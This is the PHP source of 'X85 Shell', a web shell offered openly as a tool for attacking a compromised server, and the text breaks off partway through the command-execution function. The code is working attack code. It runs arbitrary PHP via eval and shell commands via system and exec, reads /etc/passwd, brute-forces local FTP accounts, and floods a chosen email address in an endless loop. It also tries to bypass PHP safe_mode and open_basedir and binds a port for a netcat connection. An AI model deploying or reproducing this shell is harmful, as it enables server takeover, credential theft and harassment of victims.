X85 Shell

<?php
if($_GET['act'] == "phpinfo" and function_exists("phpinfo") and is_callable("phpinfo")){ phpinfo(); die(); }

$a = explode(" ",microtime());
$StartTime = $a[0] + $a[1];

@error_reporting(5);
@ignore_user_abort(TRUE);
@set_magic_quotes_runtime(0);

$X85 = new X85($StartTime);
class X85{
function X85($StartTime){
$ver = "1.0 Beta";
$this->phpv = @phpversion();
$prefix = " ".chr("187").chr("187")." ";
$suffix = NULL;
$safemodestatus = $this->SafeModeStatus();

echo <<<END
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">

<head>

<title>

X85 Shell

</title>

<style type="text/css">

html
{
overflow-x: auto;
}

body
{
background: #111111;
color: #FFFFFF;
margin: 7px;
padding: 7px;
font-family: Verdana;
font-size: 11px;
}

.ServerInfoTitle
{
text-decoration:underline;
}

.HashName
{
text-decoration:underline;
}

textarea
{
width:500px;
}

.PageTitle
{
font-size:8pt;
font-weight:Bold;
text-decoration:underline;
}

table, td, tr
{
border: 0;
}

form
{
padding: 0;
margin: 0;
}

input, select, textarea
{
background: #999999;
border: 1px solid #555555;
font-family: Verdana;
font-size: 10px;
}

.wrapper
{
background: #300000;
border: 1px outset #666666;
padding: 3px;
text-align: left;
}

a:link, a:visited, a:active
{
font-family: Verdana;
background: transparent;
color: #e3e2e2;
text-decoration: none;
}

a:hover
{
font-family: Verdana;
background: transparent;
color: #1774ba;
}

.folder
{
background: transparent;
border-bottom: 1px solid #200000;
}

.title
{
text-align: center;
}

.info
{
text-align: left;
}

.copyright
{
text-align: center;
font-size: 10px;
}

.nav
{
float: right;
font-size: 9px;
}

</style>

</head>

<body>

<div class="wrapper">

<center>

<h1>X85 Shell v.{$ver}</h1>

</center>

<hr><br />

<div class="info">

Safe Mode: {$safemodestatus}

<br />

Software: <b>{$_SERVER['SERVER_SOFTWARE']}</b>

<br />

PHP Version: <b>{$this->phpv}</b>

<br />

</div>

</div>

<br />

<table style="width:100%;">
<tr>
<td style="width:200px;vertical-align:top;" class="wrapper">
<a href="?act=list">{$prefix}List Directories & Files{$suffix}</a><br />
<a href="?act=info">{$prefix}View Server Information{$suffix}</a><br />
<a href="?act=phpinfo">{$prefix}View PHP Information{$suffix}</a><br />
<a href="?act=phpbugs">{$prefix}View PHP Bugs{$suffix}</a><br />
<a href="?act=apachebugs">{$prefix}View Apache Bugs{$suffix}</a><br />
<a href="?act=ep">{$prefix}Read /etc/passwd (Bypass){$suffix}</a><br />
<a href="?act=readfiles"><s>{$prefix}Read Files (Bypass){$suffix}</s></a><br />
<a href="?act=phpcode">{$prefix}PHP Codes Execution{$suffix}</a><br />
<a href="?act=sqlcode">{$prefix}SQL Queries Execution{$suffix}</a><br />
<a href="?act=cmdexec">{$prefix}Commands Execution{$suffix}</a><br />
<a href="?act=pass">{$prefix}Pass Server Protections{$suffix}</a><br />
<a href="?act=back">{$prefix}Bind Back Connections{$suffix}</a><br />
<a href="?act=openports">{$prefix}Open Ports Scanner{$suffix}</a><br />
<a href="?act=ftp">{$prefix}Online FTP BruteForce{$suffix}</a><br />
<a href="?act=mail">{$prefix}Online E-Mails Flooder{$suffix}</a><br />
<a href="?act=encoder">{$prefix}Professional Encoder{$suffix}</a><br />
<a href="?act=mass">{$prefix}Mass Defacer{$suffix}</a><br />
<a href="?act=bot">{$prefix}Inject bot code{$suffix}</a><br />
<a href="?act=uhnav">{$prefix}Users Host Navigation{$suffix}</a><br />
<a href="?act=remove">{$prefix}Self Remover{$suffix}</a><br />
</td>

<td class="wrapper" style="vertical-align:top;">

END;

switch($_GET['act']){
default: echo($this->ListDir($_GET['dir'])); break;
case 'info': echo($this->Details()); break;
case 'phpinfo': echo($this->ViewPHPInfo()); break;
case 'phpbugs': echo($this->ViewPHPBugs()); break;
case 'apachebugs': echo($this->ViewApacheBugs()); break;
case 'ep': echo($this->EtcPasswd()); break;
case 'phpcode': echo($this->PHPCode()); break;
case 'sqlcode': echo($this->SQLCode()); break;
case 'cmdexec': echo($this->CommandExecute()); break;
case 'ftp': echo($this->FTPBruteForce()); break;
case 'pass': echo($this->PassServerProtections()); break;
case 'back': echo($this->BackConnection()); break;
case 'openports' : echo($this->OpenPortsScanner()); break;
case 'mail': echo($this->MailFlooder()); break;
case 'encoder': echo($this->Encoder()); break;
case 'mass': echo($this->MassDefacer()); break;
case 'bot' : echo($this->BotCode()); break;
case 'uhnav': echo($this->UHNav()); break;
case 'remove' : echo($this->SelfRemove()); break;
}

$a = explode(" ",microtime());
$EndTime = substr($a[0] + $a[1] - $StartTime,0,6);

echo <<<END
</td>
</tr>
</table>
<br />

<div class="copyright">
Programmed by Hyp3rInj3cT10n & Pr0T3cT10n © 2007<br /><br />
[ Execution Time: {$EndTime} ] [ Shell Version: {$ver} ]<br />
</div>

</body>

</html>
END;
}

function EtcPasswd(){
$end = ($_GET['end'] > 0) ? $_GET['end'] : 5000 ;
$result = "<span class=\"PageTitle\">Read /etc/passwd (Bypass)</span><br /><br />";
$result .= "Read first: <input type=\"text\" id=\"first\" value=\"".$end."\" /> <input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Read\" onclick=\"javascript:location.replace('?act=ep&end='+document.getElementById('first').value);\" /><br /><br />\n";
$result .= "Trying to get /etc/passwd....";
if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){
$result .= "<span style=\"color:green;font-weight:Bold;\">Done!</span>";
$result .= '<br /><br /><table style="width:100%;"><tr><th>name</th><th>passwd</th><th>uid</th><th>gid</th><th>gecos</th><th>dir</th><th>shell</th></tr>';
for($x=0;$x<$end;$x++){
$details = posix_getpwuid($x);
if($details['name'])
$result .= '<tr><td>'.$details['name'].'</td><td>'.$details['passwd'].'</td><td>'.$details['uid'].'</td><td>'.$details['gid'].'</td><td>'.$details['gecos'].'</td><td>'.$details['dir'].'</td><td>'.$details['shell'].'</td></tr>';
}
$result .= '</table>';
}
else $result .= "<span style=\"color:red;font-weight:Bold;\">Failed.</span>";

return $result;
}

function SafeModeStatus(){
if(function_exists("ini_get") and is_callable("ini_get"))
if(ini_get('safe_mode') == "1" or strtoupper(ini_get('safe_mode')) == "ON")
return "<span style=\"color:red;font-weight:Bold;\">On</span>";
else
return "<span style=\"color:green;font-weight:Bold;\">Off</span>";
else
return "<span style=\"color:gray;font-weight:Bold;\">Unknown</span>";
}

function OpenBaseDirStatus(){
if(function_exists("ini_get") and is_callable("ini_get"))
if(strlen(ini_get('open_basedir')) > 3)
return "<span style=\"color:red;font-weight:Bold;\">On</span>";
else
return "<span style=\"color:green;font-weight:Bold;\">Off</span>";
else
return "<span style=\"color:gray;font-weight:Bold;\">Unknown</span>";
}

function Details(){
$result = "<span class=\"PageTitle\">View Server Information</span><br /><br />";

$result .= "<span class=\"ServerInfoTitle\">Safe Mode:</span> ".$this->SafeModeStatus()."<br />\n";
$result .= "<span class=\"ServerInfoTitle\">Open BaseDir:</span> ".$this->OpenBaseDirStatus()."<br />\n";

$os = @php_uname();
$Functions = array(
"PHP Version" => "phpversion",
"PHP Logo Guid" => "php_logo_guid",
"PHP Sapi Name" => "php_sapi_name",
"Zend Version" => "zend_version",
"Zend Logo Guid" => "zend_logo_guid",
"Apache Version" => "apache_get_version",
"Current User" => "get_current_user",
"Current Gid" => "getmygid",
"Current Uid" => "getmyuid",
"Current Pid" => "getmypid",
"Current Inode" => "getmyinode",
"Operation System Info" => "php_uname",
);

foreach($Functions as $desc=>$func)
if(function_exists($func) and is_callable($func))
$result .= "<span class=\"ServerInfoTitle\">".$desc.":</span> ".@$func()."<br />\n";

//Operation System Name
if(defined("PHP_OS")){
$result .= "<span class=\"ServerInfoTitle\">Operation System:</span> ".PHP_OS."<br />\n";
$os = PHP_OS;
}

//Server Software
if(isset($_SERVER['SERVER_SOFTWARE']) and strlen($_SERVER['SERVER_SOFTWARE']) > 0)
$result .= "<span class=\"ServerInfoTitle\">Server Software:</span> ".$_SERVER['SERVER_SOFTWARE']."<br />\n";

//Server IP
$result .= "<span class=\"ServerInfoTitle\">Server IP Address:</span> ".$_SERVER['SERVER_ADDR']."<br />\n";

//Loaded Modules
if(function_exists("apache_get_modules") and is_callable("apache_get_modules")){
$result .= "<span class=\"ServerInfoTitle\">Loaded Modules:</span> ";
$count_modules = 0;
foreach(apache_get_modules() as $module){
$result .= $module;

if($count_modules == count(apache_get_modules())-1)
$result.= ".";
else
$result.= ", ";

$count_modules++;
}

$result .= "<br />\n";
$result .= "<span class=\"ServerInfoTitle\">Total Loaded Modules:</span> ".$count_modules."<br />\n";
}

//Loaded Extensions
if(function_exists("get_loaded_extensions") and is_callable("get_loaded_extensions")){
$result .= "<span class=\"ServerInfoTitle\">Loaded Extensions:</span> ";
$count_ext = 0;
foreach(get_loaded_extensions() as $module){
$result .= $module;

if($count_ext == count(get_loaded_extensions())-1)
$result.= ".";
else
$result.= ", ";

$count_ext++;
}

$result .= "<br />\n";
$result .= "<span class=\"ServerInfoTitle\">Total Loaded Extensions:</span> ".$count_ext."<br />\n";
}

//Main Path
$path = (eregi("win",strtolower($os))) ? "C:" : "/" ;

//Total Disk Space
if(function_exists("disk_total_space") and is_callable("disk_total_space")){
$Total = substr(disk_total_space($path) / 1024 / 1024 / 1024,0,4);
$result .= "<span class=\"ServerInfoTitle\">Total Disk Space:</span> ".$Total." GB<br />";
}

//Free Disk Space
if(function_exists("disk_free_space") and is_callable("disk_free_space")){
$FreeFunc = "disk_free_space";
$Free = substr(disk_free_space($path) / 1024 / 1024 / 1024,0,4);
$result .= "<span class=\"ServerInfoTitle\">Free Disk Space:</span> ".$Free." GB";
}
else{
if(function_exists("diskfreespace") and is_callable("diskfreespace")){
$FreeFunc = "diskfreespace";
$Free = substr(diskfreespace($path) / 1024 / 1024 / 1024,0,4);
$result .= "<span class=\"ServerInfoTitle\">Free Disk Space:</span> ".$Free." GB";
}
}

//Free Disk Space In Percents
if(eregi("Free",$result) and eregi("Total",$result))
$result .= " (".substr($FreeFunc($path) * 100 / disk_total_space($path),0,4)."% Free)";
$result .= "<br />\n";

//Drivers
if($path != "/"){
$result .= "<span class=\"ServerInfoTitle\">Detected Drivers:</span> ";
$count = 1;
$Drivers = array();

foreach(range("a","z") as $driver)
if(is_dir($driver.":\\"))
$Drivers[] = $driver;

foreach($Drivers as $driver){
$result .= $driver;

if($count == count($Drivers))
$result .= ".";
else
$result .= ", ";
$count++;
}
}

return $result;
}

function Encoder(){
$result = "<span class=\"PageTitle\">Professional Encoder</span><br /><br />";

$string = stripslashes($_POST['encodetxt']);
$result .= "<form method=\"post\" action=\"?act=encoder\">\n";
$result .= "Text:<br />\n";
$result .= "<textarea class=\"HashesResults\" rows=\"5\" cols=\"40\" id=\"encodetxt\" name=\"encodetxt\">".htmlspecialchars($string)."</textarea><br />\n";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Encode!\" /><br />\n</form>\n";

if(isset($_POST['submit'])){
if(function_exists("hash_algos") and is_callable("hash_algos") and function_exists("hash") and is_callable("hash")){
$Hashes = hash_algos();

foreach($Hashes as $hash){
$rs = @hash($hash,$string);
$result .= "<hr /><b>".$hash.": (".strlen($rs)." letters)</b><br /><textarea class=\"HashesResults\" rows=\"1\" cols=\"1\">".$rs."</textarea><br />\n";
}
}

$More = array(
"MD5" => "md5",
"Sha1" => "sha1",
"Crc32" => "crc32",
"Crypt" => "crypt",
"Base64 Encode" => "base64_encode",
"Base64 Decode" => "base64_decode",
"UU Encode" => "convert_uuencode",
"UU Decode" => "convert_uudecode",
"URL Encode" => "urlencode",
"URL Decode" => "urldecode",
"RawURL Encode" => "rawurlencode",
"RawURL Decode" => "rawurldecode",
"UTF-8 Encode" => "utf8_encode",
"UTF-8 Decode" => "utf8_decode",
"Shuffle" => "str_shuffle",
"Reverse" => "str_rev",
"Rot13" => "str_rot13",
);
foreach($More as $name=>$func)
if(function_exists($func) and is_callable($func))
if(!in_array($func,$Hashes)){
$rs = htmlspecialchars(@$func($string));
$result .= "<hr /><b>".strtolower($name).": (".strlen($rs)." letters)</b><br /><textarea class=\"HashesResults\" rows=\"1\" cols=\"1\">".$rs."</textarea><br />\n";
}
}
return $result;
}

function PHPCode(){
ob_start();

$result = "<span class=\"PageTitle\">PHP Codes Execution</span><br /><br />\n";
$result .= "<form method=\"post\" action=\"?act=phpcode\">";
$result .= "Code:<br /><textarea rows=\"5\" cols=\"50\" id=\"code\" name=\"code\">".htmlspecialchars(stripslashes($_POST['code']))."</textarea><br />";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Execute\" />\n</form><br />";

$eval = (isset($_POST['code'])) ? stripslashes($_POST['code']) : "";
if($eval != ""){
eval($eval);
$eresult = ob_get_contents();
$result .= "<textarea rows=\"5\" cols=\"50\" readonly=\"readonly\">".htmlspecialchars($eresult)."</textarea>";
}

ob_end_clean();

return $result;
}

function SQLCode(){
$host = (isset($_POST['host'])) ? stripslashes($_POST['host']) : "localhost" ;
$username = (isset($_POST['username'])) ? stripslashes($_POST['username']) : "root" ;
$password = (isset($_POST['password'])) ? stripslashes($_POST['password']) : "" ;
$database = (isset($_POST['database'])) ? stripslashes($_POST['database']) : "" ;
$query = (isset($_POST['code'])) ? stripslashes($_POST['code']) : "" ;

$result = "<span class=\"PageTitle\">SQL Queries Execution</span><br /><br />\n";
$result .= "<form method=\"post\" action=\"?act=sqlcode\">";
$result .= "Host: <input type=\"text\" id=\"host\" name=\"host\" value=\"".$host."\" /><br /><br />\n";
$result .= "Username: <input type=\"text\" id=\"username\" name=\"username\" value=\"".htmlspecialchars($username)."\" /><br /><br />\n";
$result .= "Password: <input type=\"text\" id=\"password\" name=\"password\" value=\"".htmlspecialchars($password)."\" /><br /><br />\n";
$result .= "Database: <input type=\"text\" id=\"database\" name=\"database\" value=\"".htmlspecialchars($database)."\" /><br /><br />\n";
$result .= "Query:<br /><textarea rows=\"5\" cols=\"50\" id=\"code\" name=\"code\">".htmlspecialchars(stripslashes($_POST['code']))."</textarea><br />";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Execute\" />\n</form><br />";

if(isset($_POST['submit']))
if(!@mysql_connect($host,$username,$password))
$result .= "Error: ".htmlspecialchars(mysql_error());
else
if(!@mysql_select_db($database))
$result .= "Error: ".htmlspecialchars(mysql_error());
else
if(!@$Q=mysql_query($query))
$result .= "Error: ".htmlspecialchars(mysql_error());
else
$result .= "Query Executed Successfuly.";

return $result;
}

function MailFlooder(){
$email = (isset($_POST['email'])) ? stripslashes($_POST['email']) : "" ;
$title = (isset($_POST['title'])) ? stripslashes($_POST['title']) : "" ;
$content = (isset($_POST['content'])) ? stripslashes($_POST['content']) : "" ;

$result = "<span class=\"PageTitle\">Online E-Mails Flooder</span><br /><br />\n";
$result .= "<form method=\"post\" action=\"?act=sqlcode\">";
$result .= "To: <input type=\"text\" id=\"email\" name=\"email\" value=\"".htmlspecialchars($email)."\" /><br /><br />\n";
$result .= "Title: <input type=\"text\" id=\"title\" name=\"title\" value=\"".htmlspecialchars($title)."\" /><br /><br />\n";
$result .= "Content:<br /><textarea rows=\"5\" cols=\"50\" id=\"content\" name=\"content\">".htmlspecialchars(stripslashes($_POST['content']))."</textarea><br />";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Flood\" />\n</form><br />";

if(isset($_POST['submit'])){
if(function_exists("mail") and is_callable("mail")){
$result .= "Flooding...";
while(!$none) mail($email,$title,$content);
$result .= "The specified E-Mail Address should be flooded.";
}
else{
$result .= "Unable to send E-Mails.";
}
}
return $result;
}

function SelfRemove(){
$result = "<span class=\"PageTitle\">Self Remover</span><br /><br />";

if($_GET['confirmed'] == "true")
if(@unlink(__FILE__))
$result .= "Removed Successfully!";
else
$result .= "Can't remove myself, there are not enough permissions.";
else
$result .= "Are you sure? <a href=\"?act=remove&confirmed=true\">Yes</a> <a href=\"?\">No</a>";
return $result;
}

function OpenPortsScanner(){
$rstart = (isset($_POST['rstart']) and is_numeric($_POST['rstart']) and $_POST['rstart'] >= 1) ? $_POST['rstart'] : 1 ;
$rend = (isset($_POST['rend']) and is_numeric($_POST['rend']) and $_POST['rend'] > 1) ? $_POST['rend'] : 999999 ;
echo("<script type=\"text/javascript\">");
echo("function Show(SelectValue){");
echo("document.getElementById('RangeDiv').style.display=\"none\";");
echo("document.getElementById('SpecificDiv').style.display=\"none\";");
echo("if(SelectValue == \"range\")");
echo("document.getElementById('RangeDiv').style.display=\"inline\";");
echo("if(SelectValue == \"specific\")");
echo("document.getElementById('SpecificDiv').style.display=\"inline\";");
echo("}</script>");
echo("<span class=\"PageTitle\">Open Ports Scanner</span><br /><br />");
echo('<form method="post" action="?act=openports">');
echo('<u>Ports:</u><br /><br />');
echo('<select id="port" name="port" onchange="javascript:Show(this.value);">');
echo('<option value="automatic">Automatic - All Ports</option>');
echo('<option value="range">Range of Ports</option>');
echo('<option value="specific">Specific Ports</option>');
echo('</select><br /><br />');
echo('<div id="RangeDiv" style="display:none;">From: <input type="text" id="rstart" name="rstart" value="'.$rstart.'" /> To: <input type="text" id="rend" name="rend" value="'.$rend.'" /><br /><br /></div>');
echo('<div id="SpecificDiv" style="display:none;"><textarea rows="5" cols="50" id="specific" name="specific" />'.@htmlspecialchars($_POST['specific']).'</textarea><br />Use space (not new line!) to separate between the ports.<br /><br /></div>');
echo('<input type="submit" id="submit" name="submit" value="Scan" />');
echo('</form>');
if(isset($_POST['submit'])){
$first = "yes";
echo("<br /><br /><u>Results</u>:<br />\n");

if($_POST['port'] == "range"){
if($rend > $rstart){
for($i=$rstart;$i<$rend;$i++){
if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
if($first == "no")
echo(", ");
echo $i;
$first = "no";
}
}
echo(".");
}
else{
echo("Range start number can't be bigger than the end number.");
}
}
else if($_POST['port'] == "specific"){
$list = explode(" ",$_POST['specific']);
foreach($list as $i){
if(is_numeric($i)){
if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
if($first == "no")
echo(", ");
echo $i;
$first = "no";
}
}
}
echo(".");
}
else{
for($i=0;$i>=0;$i++){
if(@fsockopen($_SERVER['SERVER_ADDR'],$i) == TRUE){
if($first == "no")
echo(", ");
echo $i;
$first = "no";
}
}
echo(".");
}
}
}

function ListDir($dir){

function LettersPerms($file){
$perms = @fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}

// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));

// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));

// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));

return $info;
}

if($dir == "") $dir = $_SERVER['DOCUMENT_ROOT'].dirname($_SERVER['PHP_SELF'])."/";

$result = "<span class=\"PageTitle\">List Directories & Files</span><br /><br />";
$result .= "Trying to list directory: ";
$Pathes = explode("/",$dir);
$lastpath = NULL;
foreach($Pathes as $k=>$path){
if($path != "" or $k == "0"){
$path .= "/";
$result .= "<a href=\"?act=list&dir=".$lastpath.$path."\">".$path."</a>";
$lastpath .= $path;
}
}

$result .= "<br /><br />\n";
$result .= "<table style=\"width:100%;\"><tr><th>Name</th><th>Size</th><th>Last Modified</th><th>Permissions</th><th>Actions</th></tr>";

if(dirname($dir) != str_replace("\/","",$dir))
$result .= "<tr>\n";
$result .= "<td><a href=\"?act=list&dir=".dirname($dir)."/\">..</a></td>\n";
$result .= "<td> - </td>\n";
$result .= "<td> </td>\n";
$result .= "<td>".@fileperms(dirname($dir))." (".LettersPerms(dirname($dir)).")"."</td>\n";
$result .= "<td> </td>\n";
$result .= "</tr>\n";

$glob = $dir."*";
$files = glob($glob);
foreach($files as $name){
$FileDir = dirname($name)."/";
$FileName = basename($name);

if(is_dir($FileDir.$FileName)){
$result .= "<tr>\n";
$result .= "<td><a href=\"?act=list&dir=".$FileDir.$FileName."/\">".$FileName."/</a></td>\n";
$result .= "<td> - </td>\n";
$result .= "<td> </td>\n";
$result .= "<td>".@fileperms($FileDir.$FileName)." (".@LettersPerms($FileDir.$FileName).")"."</td>\n";
$result .= "<td> </td>\n";
$result .= "</tr>\n";
}
else{
$result .= "<tr>\n";
$result .= "<td><a href=\"?act=viewfi?le&dir=".$FileDir."/&file=".$FileName."\">".$FileName."</a></td>\n";
$result .= "<td>".substr(filesize($FileDir.$FileName) / 1024,0,6)." KB</td>\n";
$result .= "<td> </td>\n";
$result .= "<td>".@fileperms($FileDir.$FileName)." (".@LettersPerms($FileDir.$FileName).")"."</td>\n";
$result .= "<td> </td>\n";
$result .= "</tr>\n";
}
}

$result .= "</table><br /><br />\n";
$result .= "<fieldset>\n";
$result .= "<legend>More Options:</legend>\n";
$result .= "<form method=\"post\">\n";
$result .= "Jump To Directory: <input type=\"text\" id=\"jdir\" style=\"width:300px\" value=\"".htmlspecialchars($dir)."\"> <input type=\"button\" value=\"Jump\" onclick=\"javascript:location.replace('?act=list&dir='+document.getElementById('jdir').value);\" /><br /><br />\n";
$result .= "Create Directory: <input type=\"text\" id=\"cdir\" style=\"width:100px;\" name=\"cdir\" value=\"".htmlspecialchars($_POST['cdir'])."\"> <input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Create\" /><br />\n";
$result .= "</form></fieldset><br />\n";

return $result;
}

function FTPBruteForce(){
echo("<span class=\"PageTitle\">Online FTP BruteForce</span><br /><br />");
$_POST['usernames'] = htmlspecialchars($_POST['usernames']);
$_POST['passwords'] = htmlspecialchars($_POST['passwords']);
$chkdun = (isset($_POST['all_usernames'])) ? " checked=\"checked\"" : "" ;
$chkdpw = (isset($_POST['password_equal_username'])) ? " checked=\"checked\"" : "" ;

echo('<form method="post" action="?act=ftp">');
echo('<u>Usernames:</u><br />');
echo('<input type="checkbox" id="all_usernames" name="all_usernames"'.$chkdun.' /> All usernames in the server<br />');
echo('<strong>OR</strong><br />');
echo('Specific usernames:<br />');
echo('<textarea rows="5" cols="50" id="usernames" name="usernames" />'.$_POST['usernames'].'</textarea><br />');
echo('<br />');
echo('<u>Passwords:</u><br />');
echo('<input type="checkbox" id="password_equal_username" name="password_equal_username"'.$chkdpw.' /> The username is the password.<br />');
echo('Specific passwords:<br />');
echo('<textarea rows="5" cols="50" id="passwords" name="passwords" />'.$_POST['passwords'].'</textarea><br /><br />');
echo('<input type="submit" id="submit" name="submit" value="Start" />');
echo('</form>');

if(isset($_POST['submit'])){
echo('<br /><br /><u>Results:</u><br />');
if(function_exists("fsockopen") and is_callable("fsockopen")){
$start = time();
$host = "127.0.0.1";
$port = "21";

$usernames = explode("\r\n",$_POST['usernames']);
$passwords = explode("\r\n",$_POST['passwords']);

if(isset($_POST['all_usernames'])){
if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){
$usernames = array();
$number = ($_POST['end'] > 0) ? $_POST['end'] : "5000";

for($x=0;$x<$number;$x++){
$user = posix_getpwuid($x);
if(strlen($user[name]) > 0)
$usernames[] = $user[name];
}
}
else{
echo("Unable to get usernames list.<br />");
}
}

$usernames_count = count($usernames);
$passwords_count = count($passwords);
$results = 0;

foreach($usernames as $user){
if(isset($_POST['password_equal_username']))
$passwords['user'] = $user;

foreach($passwords as $pass){
$sock = @fsockopen($host, $port, $errno, $errstr, 10);
$get = @fgets($sock, 150);
@fputs($sock, "USER " .$user. "\n");
$get = @fgets($sock, 150);
@fputs($sock, "PASS " .$pass. "\n");
$get = @fgets($sock, 150);

if(strstr($get, "logged")){
$results++;

echo "Username: ".$user." Password: ".$pass."<br />\n";
@fclose($sock);
}
else{
@fclose($sock);
}

@fclose($sock);
}
}
$finish = time();
$seconds = number_format($finish-$start);

//Statistics
echo("<br /><u>Statistics:</u><br />Checked Accounts: {$usernames_count}<br />\nChecked Passwords: {$passwords_count}<br />\nHacked Accounts: {$results}<br />\nScan Time: {$seconds} seconds<br />\n");
}
else{
echo("Unable to start scanning.<br />");
}
}
}

function PassServerProtections(){
echo("<span class=\"PageTitle\">Pass Server Protections (Safe Mode & Open Base Dir)</span><br /><br />");

if(eregi("off",strtolower($this->SafeModeStatus())) and eregi("off",strtolower($this->OpenBaseDirStatus()))){
echo("The safe mode and the open base dir are off.");
}
else{
$inSafeMode = "<span class=\"ServerInfoTitle\">Safe Mode:</span> <span style=\"color:green;font-weight:Bold;\">Off</span><br />";
$inOpenBaseDir = "<span class=\"ServerInfoTitle\">Open BaseDir:</span> <span style=\"color:green;font-weight:Bold;\">Off</span><br />";
if(function_exists("posix_getpwuid") and is_callable("posix_getpwuid")){
if(function_exists("get_current_user") and is_callable("get_current_user")){
$details = posix_getpwuid(get_current_user());
$user = $details['user'];
}
else{
if(function_exists("getmyuid") and is_callable("getmyuid")){
$details = posix_getpwuid(getmyuid());
$user = $details['user'];
}
}
}

if(strlen($user) <= 0 and eregi("/home/",$_SERVER['DOCUMENT_ROOT']) and eregi("/domains/",$_SERVER['DOCUMENT_ROOT'])){
$explode = explode("/",$_SERVER['DOCUMENT_ROOT']);
$user = $explode[2];
}

if(strlen($user) > 0){
echo("Trying to pass this server protections...");
$url = "http://".$_SERVER['SERVER_ADDR']."/~".$user."/".$_SERVER['SCRIPT_NAME']."?act=info";
$source = file_get_contents($url);

if(eregi($inSafeMode,$source))
$safemode = "<span style=\"color:green;font-weight:Bold;\">Passed</span><br />\n";
else
$safemode = "<span style=\"color:red;font-weight:Bold;\">Not Passed</span><br />\n";

if(eregi($inOpenBaseDir,$source))
$openbasedir = "<span style=\"color:green;font-weight:Bold;\">Passed</span><br />\n";
else
$openbasedir = "<span style=\"color:red;font-weight:Bold;\">Not Passed</span><br />\n";

if(eregi("green",$safemode) or eregi("green",$openbasedir)){
echo("<span style=\"color:green;font-weight:Bold;\">Done!</span><br /><br />\n");
echo("Safe Mode: ".$safemode);
echo("Open Base Dir: ".$openbasedir);
echo("<br /><a href=\"".$url."\">CLICK HERE TO PASS</a><br />\n");
}
else{
echo("<span style=\"color:red;font-weight:Bold;\">Failed!</span><br />\n");
}
}
else{
echo("Unable to get this account username");
}
}
}

function BackConnection(){
$port = (isset($_POST['port']) and is_numeric($_POST['port'])) ? $_POST['port'] : "1337" ;

echo("<span class=\"PageTitle\">Bind Back Connections</span><br /><br />");
echo("Bind the port and than run this in your netcat: nc ".$_SERVER['SERVER_ADDR']." <span id=\"backconnport\">1337</span><br /><br />");
echo("<form method=\"post\" action=\"?act=back\">Port: <input type=\"text\" id=\"port\" name=\"port\" value=\"".$port."\" onkeyup=\"javascript:if(document.getElementById('port').value > 0) document.getElementById('backconnport').innerHTML=this.value; else document.getElementById('backconnport').innerHTML='1337';\" maxlength=\"6\" /> <input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Bind\" /></form><br />");

if(isset($_POST['submit'])){
$address = $_SERVER['SERVER_ADDR'];
$mysock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
socket_bind($mysock, $address, $port) or die("Error: Can't bind to <" .$address. ":" .$port. ">\n");
socket_listen($mysock, 5);
$client = socket_accept($mysock);
socket_write($client, "-= PHP Bindshell =-\n");
while(1){
socket_write($client, "> ");
$input = socket_read($client, 1024);
if(trim($input) == "quit") break;
socket_write($client, $input);
}
socket_close($client);
socket_close($mysock);
}
}

function CommandExecute(){
ob_start();

$cmd = stripslashes($_POST['code']);
$result = "<span class=\"PageTitle\">Commands Execution</span><br /><br />\n";
$result .= "<table style=\"width:100%;\">\n<tr>\n<td style=\"vertical-align:top;width:550px;\">\n";
$result .= "<form method=\"post\" action=\"?act=cmdexec\">\n";
$result .= "Command:<br />\n";
$result .= "<textarea rows=\"5\" cols=\"50\" id=\"code\" name=\"code\">".htmlspecialchars($cmd)."</textarea><br />\n";
$result .= "<input type=\"submit\" id=\"submit\" name=\"submit\" value=\"Execute\" /><br />\n</form>\n";

if(isset($_POST['code'])){
$result .= "<br />";
$list = array("system","shell_exec","passthru","exec",);
foreach($list as $func)
if(function_exists($func) and is_callable($func)){
$chosen = "yes";

if($func($cmd)){
break;
}
}

if($chosen != "yes"){
$result .= "Unable to execute commands on this server.";
}
else{
$eresult = ob_get_contents();
$res = (strlen($eresult) > 0) ? $eresult : $func($cmd) ;

if($res == "")
$result .= "Your command didn't return results.";
else
$result .= "Results:<br /><textarea rows=\"20\" cols=\"50\">".$res."</textarea><br />";
}
}

ob_end_clean();

$result .= "</td>\n<td style=\"vertical-align:top;\">\n";
$result .= "<u>Useful Commands:</u><br />\n";
$result .= "<a href=\"#\" onclick=\"javascript:document.getElementById('code').value='netstat -an | grep -i listen';\">View Open Ports</a><br />\n";
